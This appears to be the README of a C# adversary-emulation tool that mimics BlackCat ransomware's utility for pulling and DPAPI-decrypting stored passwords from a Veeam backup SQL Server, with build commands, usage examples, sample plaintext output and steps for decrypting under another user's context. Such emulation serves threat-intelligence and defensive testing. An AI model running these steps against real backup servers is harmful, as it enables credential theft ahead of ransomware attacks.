# Infostealer

# InfoStealer

This C# utility emulates BlackCat's custom utility to query Veeam backup SQL Server to extract passwords.

# Building

  • Leverage CMake to build the executable in the project's root directory.
$> cmake -B .

Note, CMakeLists is wrapping dotnet commands to build the CSharp application

This command will generate a debug and release build. You will want the release build, this is located at infostealer\sqlsharp\bin\x64\Release\net6.0-windows\win-x86\publish

Build with dotnet

dotnet restore InfoStealer.sln

dotnet publish InfoStealer.sln -r win-x86 -p:PlatformTarget=x86 -p:PublishSingleFile=true --sc -c Release -p:IncludeNativeLibrariesForSelfExtract=true

# Execution

A DPAPI blob can be generated using the gen_dpapi_blob.ps1 script. The script takes 1 argument -String and encrypted the provided string with DPAPI. Example:

./gen_dpapi_blob.ps1 -String Sup3rS3cr3tP@ssword1!
  • Query local MS SQL server (localhost) with specific username (testlogin), and password (Password)
C:\> .\infostealer.exe dpapi localhost testlogin Password*

test-1, abc123, test-1 user
test-2, hunter2, test-2 user
test-3, iloveu, test-3 user
test-4, qwerty, test-4 user
test-5, password, test-5 user
  • Decrypt a provide dpapi base64 encoded blob:
InfoStealer.exe string AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAZGBrWVmdPka5Sod9PXlnJgAAAAACAAAAAAAQZgAAAAEAACAAAAAPXaR6tzM6G7mdC2NnJ7u2On2rDD1FzQdBKcaf1uhWkwAAAAAOgAAAAAIAACAAAAD8ZUG03DrI9ncxu4Csr6GYhu7vnO2wEi8ZscVSK+qL2RAAAABoGWkFNCJFa1oAlN63k+I/QAAAABx0tHePfk99nrSpOqsbmOaAR8b95SOCBRZKbOnsOaDUcVjMWAeQ2AptPJz2HtfXrhSPEHHbvD/H8mG4gr6yaB8=
  • Execute Help menu
C:\> infostealer.exe -h
[help] sqlsharp.exe <type> <SQL Database Source> username password
         Ex: sqlsharp.exe dpapi localhost veemadmin Password*
         Ex: sqlsharp.exe string <base64 encoded dpapi blob>
         type: base64, dpapi, string; (a string is a base64 encoded dpapi blob passed directly in)

# Executing under another user context

If the passwords are DPAPI encrypted using another users password, you can run the applcation using that users context as long as you have the users password: Open a command prompt, then enter the following:

runas /user:<USERNAME> cmd

InfoStealer.exe string AQAAAN...

# CTI